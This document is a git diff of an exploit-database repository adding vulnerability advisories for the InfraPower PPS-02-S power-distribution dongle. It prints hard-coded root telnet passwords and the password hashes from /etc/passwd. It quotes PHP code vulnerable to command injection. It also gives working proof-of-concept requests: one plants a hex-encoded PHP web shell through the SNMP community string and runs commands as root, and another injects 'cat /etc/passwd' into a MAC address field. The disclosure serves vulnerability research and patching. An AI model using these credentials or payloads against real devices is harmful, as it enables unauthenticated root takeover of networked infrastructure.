32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
|
32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
|
||||||
|
@ -36728,6 +36728,13 @@ id,file,description,date,author,platform,type,port
|
||||||
40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
|
40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0
|
||||||
40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
|
40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0
|
||||||
40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
|
40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0
|
||||||
|
40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0
|
||||||
|
40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0
|
||||||
|
40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0
|
||||||
|
40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple XSS",2016-10-28,LiquidWorm,php,webapps,0
|
||||||
|
40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0
|
||||||
|
40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0
|
||||||
|
40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0
|
||||||
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
|
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
|
||||||
40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
|
40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0
|
||||||
40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
|
40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
|
||||||
|
|
Can't render this file because it is too large.
|
195
platforms/hardware/remote/40643.txt
Executable file
195
platforms/hardware/remote/40643.txt
Executable file
|
@ -0,0 +1,195 @@
|
||||||
|
InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Austin Hughes Electronics Ltd.
|
||||||
|
Product web page: http://www.austin-hughes.com
|
||||||
|
Affected version: Q213V1 (Firmware: V2395S)
|
||||||
|
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
|
||||||
|
|
||||||
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
||||||
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
||||||
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
||||||
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
||||||
|
PDUs in daisy chain - which is a highly efficient cient application
|
||||||
|
for saving not only the IP remote accessories cost, but also the true
|
||||||
|
IP addresses required on the PDU management.
|
||||||
|
|
||||||
|
Desc: InfraPower suffers from a use of hard-coded credentials. The IP
|
||||||
|
dongle firmware ships with hard-coded accounts that can be used to gain
|
||||||
|
full system access (root) using the telnet daemon on port 23.
|
||||||
|
|
||||||
|
Tested on: Linux 2.6.28 (armv5tel)
|
||||||
|
lighttpd/1.4.30-devel-1321
|
||||||
|
PHP/5.3.9
|
||||||
|
SQLite/3.7.10
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5371
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
|
||||||
|
|
||||||
|
|
||||||
|
27.09.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
# cat /etc/passwd
|
||||||
|
|
||||||
|
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
|
||||||
|
bin:x:1:1:bin:/bin:/bin/sh
|
||||||
|
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
|
||||||
|
adm:x:3:4:adm:/adm:/bin/sh
|
||||||
|
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
|
||||||
|
sync:x:5:0:sync:/bin:/bin/sync
|
||||||
|
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
|
||||||
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
||||||
|
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
|
||||||
|
operator:x:11:0:Operator:/var:/bin/sh
|
||||||
|
nobody:x:99:99:nobody:/home:/bin/sh
|
||||||
|
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
|
||||||
|
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
|
||||||
|
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
|
||||||
|
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
|
||||||
|
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
|
||||||
|
|
||||||
|
# showing accounts in root group:
|
||||||
|
|
||||||
|
Username: root
|
||||||
|
Password: 8475
|
||||||
|
--
|
||||||
|
Username: service
|
||||||
|
Password: ipdongle
|
||||||
|
--
|
||||||
|
Username: www
|
||||||
|
Password: 9311
|
||||||
|
--
|
||||||
|
Username: www2
|
||||||
|
Password: 9311
|
||||||
|
|
||||||
|
# showing other less-privileged accounts:
|
||||||
|
|
||||||
|
Username: user
|
||||||
|
Password: 8475
|
||||||
|
--
|
||||||
|
Username: admin
|
||||||
|
Password: 8475
|
||||||
|
|
||||||
|
--------
|
||||||
|
|
||||||
|
/mnt/mtd # echo $SHELL
|
||||||
|
/sbin/root_shell.sh
|
||||||
|
/mnt/mtd # cat /sbin/root_shell.sh
|
||||||
|
#!/bin/sh
|
||||||
|
trap "" 2 3 9 24
|
||||||
|
|
||||||
|
# check login
|
||||||
|
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
|
||||||
|
|
||||||
|
if [ "$passWork" = "1" ]; then
|
||||||
|
login_file=/mnt/mtd/root_login
|
||||||
|
now_timestamp=`date +%s`
|
||||||
|
|
||||||
|
if [ -f $login_file ]; then
|
||||||
|
line=`wc -l $login_file | cut -c 1-9`
|
||||||
|
if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
|
||||||
|
pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
|
||||||
|
pre_result1=`echo $pre_login | cut -d " " -f 1`
|
||||||
|
pre_result2=`echo $pre_login | cut -d " " -f 2`
|
||||||
|
pre_result3=`echo $pre_login | cut -d " " -f 3`
|
||||||
|
if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
|
||||||
|
pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
|
||||||
|
result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
|
||||||
|
if [ "$result" != "success" ]; then
|
||||||
|
echo $result
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -n "password:"
|
||||||
|
read pass
|
||||||
|
if [ "$pass" != "999" ]; then
|
||||||
|
echo "wrong password"
|
||||||
|
echo fail $now_timestamp >> $login_file
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
echo success $now_timestamp >> $login_file
|
||||||
|
fi
|
||||||
|
|
||||||
|
/bin/sh
|
||||||
|
/mnt/mtd #
|
||||||
|
|
||||||
|
--------
|
||||||
|
|
||||||
|
/mnt/mtd # ls
|
||||||
|
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
|
||||||
|
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
|
||||||
|
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
|
||||||
|
|
||||||
|
--------
|
||||||
|
|
||||||
|
/mnt/mtd # df -h
|
||||||
|
|
||||||
|
Filesystem Size Used Available Use% Mounted on
|
||||||
|
tmpfs 256.0M 4.0K 256.0M 0% /tmp
|
||||||
|
/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
|
||||||
|
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
|
||||||
|
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
|
||||||
|
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
|
||||||
|
|
||||||
|
--------
|
||||||
|
|
||||||
|
/www # ls -al
|
||||||
|
|
||||||
|
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
|
||||||
|
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
|
||||||
|
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
|
||||||
|
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
|
||||||
|
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
|
||||||
|
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
|
||||||
|
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
|
||||||
|
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
|
||||||
|
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
|
||||||
|
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
|
||||||
|
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
|
||||||
|
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
|
||||||
|
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
|
||||||
|
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
|
||||||
|
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
|
||||||
|
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
|
||||||
|
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
|
||||||
|
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
|
||||||
|
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
|
||||||
|
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
|
||||||
|
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
|
||||||
|
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
|
||||||
|
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
|
||||||
|
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
|
||||||
|
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
|
||||||
|
-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
|
||||||
|
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
|
||||||
|
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
|
||||||
|
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
|
||||||
|
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
|
||||||
|
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
|
||||||
|
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
|
||||||
|
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
|
||||||
|
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
|
||||||
|
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
|
||||||
|
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
|
||||||
|
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
|
||||||
|
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
|
||||||
|
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
|
||||||
|
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
|
||||||
|
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
|
||||||
|
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
|
||||||
|
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
|
||||||
|
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
|
||||||
|
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
|
||||||
|
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php
|
||||||
|
|
348
platforms/hardware/webapps/40640.txt
Executable file
348
platforms/hardware/webapps/40640.txt
Executable file
|
@ -0,0 +1,348 @@
|
||||||
|
InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Austin Hughes Electronics Ltd.
|
||||||
|
Product web page: http://www.austin-hughes.com
|
||||||
|
Affected version: Q213V1 (Firmware: V2395S)
|
||||||
|
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
|
||||||
|
|
||||||
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
||||||
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
||||||
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
||||||
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
||||||
|
PDUs in daisy chain - which is a highly efficient cient application
|
||||||
|
for saving not only the IP remote accessories cost, but also the true
|
||||||
|
IP addresses required on the PDU management.
|
||||||
|
|
||||||
|
Desc: InfraPower suffers from multiple unauthenticated remote command
|
||||||
|
injection vulnerabilities. The vulnerability exist due to several POST
|
||||||
|
parameters in several scripts not being sanitized when using the exec(),
|
||||||
|
proc_open(), popen() and shell_exec() PHP function while updating the
|
||||||
|
settings on the affected device. This allows the attacker to execute
|
||||||
|
arbitrary system commands as the root user and bypass access controls in
|
||||||
|
place.
|
||||||
|
|
||||||
|
Tested on: Linux 2.6.28 (armv5tel)
|
||||||
|
lighttpd/1.4.30-devel-1321
|
||||||
|
PHP/5.3.9
|
||||||
|
SQLite/3.7.10
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5372
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
|
||||||
|
|
||||||
|
|
||||||
|
27.09.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
doupgrate.php:
|
||||||
|
--------------
|
||||||
|
|
||||||
|
|
||||||
|
09: <?
|
||||||
|
10: echo "Firmware Upgrate Using NFS:<BR>";
|
||||||
|
11: echo "IP=".$_POST["ipaddr"]."<BR>";
|
||||||
|
12: echo "Firmware Name=".$_POST["fwname"]."<BR>";
|
||||||
|
13: system("sh nfs.sh");
|
||||||
|
14: echo "Mounting NFS<BR>";
|
||||||
|
15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
|
||||||
|
16: system("cp /nfs/".$_POST["fwname"]." /");
|
||||||
|
17: echo "Flash erasing<BR>";
|
||||||
|
18: system("@flash_eraseall /dev/mtd0");
|
||||||
|
19: system("cp /".$_POST["fwname"]." /dev/mtd0");
|
||||||
|
20: echo "Upgrate done<BR>";
|
||||||
|
21: system("umount /nfs");
|
||||||
|
22: echo "Reboot system<BR>";
|
||||||
|
23: system("reboot");
|
||||||
|
24: ?>
|
||||||
|
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
IPSettings.php:
|
||||||
|
---------------
|
||||||
|
|
||||||
|
|
||||||
|
83: $IP_setting = ereg_ip($_POST['IP']);
|
||||||
|
84: $Netmask_setting = ereg_ip($_POST['Netmask']);
|
||||||
|
85: $Gateway_setting = ereg_ip($_POST['Gateway']);
|
||||||
|
...
|
||||||
|
...
|
||||||
|
110: $fout = fopen("/mnt/mtd/net_conf", "w");
|
||||||
|
111: if($fout){
|
||||||
|
112: $output = substr($output, 0, -1);
|
||||||
|
113: fprintf($fout, "%s", $output);
|
||||||
|
114: //echo $change_ip.'b';
|
||||||
|
115: if($change_ip === '1'){
|
||||||
|
116: $str = '';
|
||||||
|
117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
|
||||||
|
118: // echo $str."\n";
|
||||||
|
119: }
|
||||||
|
120: if($change_gw === '1'){
|
||||||
|
121: $str = '';
|
||||||
|
122: exec('ip route del default', $str);
|
||||||
|
123: exec('route add default gw '.$Gateway_setting, $str);
|
||||||
|
124: // echo $str[0]."a\n";
|
||||||
|
125: }
|
||||||
|
126: }
|
||||||
|
127: fclose($fout);
|
||||||
|
...
|
||||||
|
...
|
||||||
|
164: function ereg_ip($ipstring){
|
||||||
|
165: $ipstring=trim($ipstring); //移除前後空白
|
||||||
|
166: //格式錯誤
|
||||||
|
167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
|
||||||
|
168: //內容檢查
|
||||||
|
169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
|
||||||
|
170: foreach($ip_segment as $k =>$v){
|
||||||
|
171: if($v >255){
|
||||||
|
171: return 0;
|
||||||
|
172: }
|
||||||
|
173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
|
||||||
|
174: } //end foreach
|
||||||
|
175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
|
||||||
|
176: return $ipstring;
|
||||||
|
177: }
|
||||||
|
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
Login.php:
|
||||||
|
----------
|
||||||
|
|
||||||
|
|
||||||
|
126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
|
||||||
|
127: $Password = getConf("/mnt/mtd/web_conf", "Password");
|
||||||
|
128:
|
||||||
|
129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
|
||||||
|
130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
|
||||||
|
...
|
||||||
|
...
|
||||||
|
140: $_SESSION['Login'] = $_POST['ID_User'];
|
||||||
|
141:
|
||||||
|
142: //Login
|
||||||
|
143: $loginTime = date("Y-m-d,H:i:s.0,P");
|
||||||
|
144: $remoteIP = $_SERVER['REMOTE_ADDR'];
|
||||||
|
145: //----------SNMP checking ---Ed 20130307------------------------<
|
||||||
|
146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
|
||||||
|
147: if ($SNMPEnable == "1") {
|
||||||
|
148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
|
||||||
|
149: if ($TrapEnable == "v2Trap") {
|
||||||
|
150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
|
||||||
|
151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
|
||||||
|
152: //echo "alert($res);";
|
||||||
|
153: }
|
||||||
|
154: }
|
||||||
|
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
Ntp.php:
|
||||||
|
--------
|
||||||
|
|
||||||
|
|
||||||
|
36: <?php
|
||||||
|
37: if(empty($_POST['Change']))
|
||||||
|
38: $tzone='8';
|
||||||
|
39: else
|
||||||
|
40: {
|
||||||
|
41:
|
||||||
|
42: $tzone=$_POST['ID_timezone'];
|
||||||
|
43: $idx=$tzone+12;
|
||||||
|
44: echo "update status...";
|
||||||
|
45: exec("/usr/bin/ntpclient -s -h 220.130.158.71");
|
||||||
|
46: exec("/usr/bin/zonegen ".$idx);
|
||||||
|
47: exec("/usr/bin/zic -d /usr/bin/ zonetime");
|
||||||
|
48: exec("mv /usr/bin/localtime /etc/localtime");
|
||||||
|
49: echo "OK";
|
||||||
|
50: }
|
||||||
|
51: ?>
|
||||||
|
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
production_test1.php:
|
||||||
|
---------------------
|
||||||
|
|
||||||
|
|
||||||
|
4: if( isset($_POST['macAddress']) )
|
||||||
|
5: {
|
||||||
|
6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
|
||||||
|
7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
|
||||||
|
8: /*$result = $fail;
|
||||||
|
9: echo $mac . ",";
|
||||||
|
10: echo $_POST['macAddress'];
|
||||||
|
11: if( !strcmp($mac,$_POST['macAddress']) )
|
||||||
|
12: $result = $success;
|
||||||
|
13: echo "verify - " . $mac . " - " . $result;*/
|
||||||
|
14: echo "verify - " . $mac;
|
||||||
|
15:
|
||||||
|
16: exit();
|
||||||
|
17: }
|
||||||
|
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
SNMP.php:
|
||||||
|
---------
|
||||||
|
|
||||||
|
|
||||||
|
34: if($_POST["SNMPAgent"] === "Enable"){
|
||||||
|
35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
|
||||||
|
36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
|
||||||
|
37:
|
||||||
|
38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
|
||||||
|
39: {
|
||||||
|
40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
|
||||||
|
41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
|
||||||
|
42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
|
||||||
|
43: setSnmpConf(1,$_POST["CommuintyString"]);
|
||||||
|
44: setSnmpConf(2,$_POST["CommuintyWrite"]);
|
||||||
|
45: $pCommunity = $_POST["CommuintyString"];
|
||||||
|
46: }
|
||||||
|
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
System.php:
|
||||||
|
-----------
|
||||||
|
|
||||||
|
|
||||||
|
86: if(!empty($_POST['ChangeTime']) == "1"){
|
||||||
|
87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
|
||||||
|
88:
|
||||||
|
89: //Ray modify
|
||||||
|
90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
|
||||||
|
91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
|
||||||
|
92:
|
||||||
|
93:
|
||||||
|
94: if(isset($_POST['TimeZone'])){
|
||||||
|
95: setTimeZone($_POST['TimeZone']);
|
||||||
|
96: $orgZone = $_POST['TimeZone'];
|
||||||
|
97: }
|
||||||
|
98:
|
||||||
|
99: exec('date '.$datetime);
|
||||||
|
100: exec('hwclock -w');
|
||||||
|
101: exec('hwclock -w -f /dev/rtc1');
|
||||||
|
...
|
||||||
|
...
|
||||||
|
180: if(isset($_POST['TimeServer'])){
|
||||||
|
181: //$TimeServer = ereg_ip($_POST['TimeServer']);
|
||||||
|
182: if(!empty($_POST['TimeServer'])){
|
||||||
|
183: $TimeServer = $_POST['TimeServer'];
|
||||||
|
184:
|
||||||
|
185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
|
||||||
|
...
|
||||||
|
...
|
||||||
|
286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
|
||||||
|
...
|
||||||
|
...
|
||||||
|
292: exec('route add default gw '.$Gateway_setting, $str);
|
||||||
|
...
|
||||||
|
...
|
||||||
|
336: function ereg_ip($ipstring){
|
||||||
|
337: $ipstring=trim($ipstring); //移除前後空白
|
||||||
|
338: //格式錯誤
|
||||||
|
339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
|
||||||
|
340: //內容檢查
|
||||||
|
341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
|
||||||
|
342: foreach($ip_segment as $k =>$v){
|
||||||
|
343: if($v >255){
|
||||||
|
344: return 0;
|
||||||
|
345: }
|
||||||
|
346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
|
||||||
|
347: } //end foreach
|
||||||
|
348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
|
||||||
|
349: return $ipstring;
|
||||||
|
350: }
|
||||||
|
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
UploadEXE.php:
|
||||||
|
--------------
|
||||||
|
|
||||||
|
|
||||||
|
72: if(isset($_POST['hasFile'])){
|
||||||
|
73: if ($_FILES['ExeFile']['error'] > 0){
|
||||||
|
74: echo 'Error: ' . $_FILES['FW']['error'];
|
||||||
|
75: }else{
|
||||||
|
76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';
|
||||||
|
...
|
||||||
|
...
|
||||||
|
80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
|
||||||
|
81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
|
||||||
|
82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
|
||||||
|
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
---------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
#1
|
||||||
|
--
|
||||||
|
|
||||||
|
PoC Request:
|
||||||
|
|
||||||
|
curl -i -s -k -X 'POST' \
|
||||||
|
-H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
|
||||||
|
--data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
|
||||||
|
'https://192.168.0.17/SNMP.php?Menu=SMP'
|
||||||
|
|
||||||
|
...
|
||||||
|
|
||||||
|
curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a
|
||||||
|
|
||||||
|
Response:
|
||||||
|
|
||||||
|
root
|
||||||
|
at
|
||||||
|
Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
|
||||||
|
|
||||||
|
|
||||||
|
#2
|
||||||
|
--
|
||||||
|
|
||||||
|
PoC Request:
|
||||||
|
|
||||||
|
POST /production_test1.php HTTP/1.1
|
||||||
|
Host: 192.168.0.17
|
||||||
|
User-Agent: ZSL-Injectinator/3.1 (Unix)
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
|
||||||
|
|
||||||
|
|
||||||
|
Response:
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
X-Powered-By: PHP/5.3.9
|
||||||
|
Content-type: text/html
|
||||||
|
Connection: close
|
||||||
|
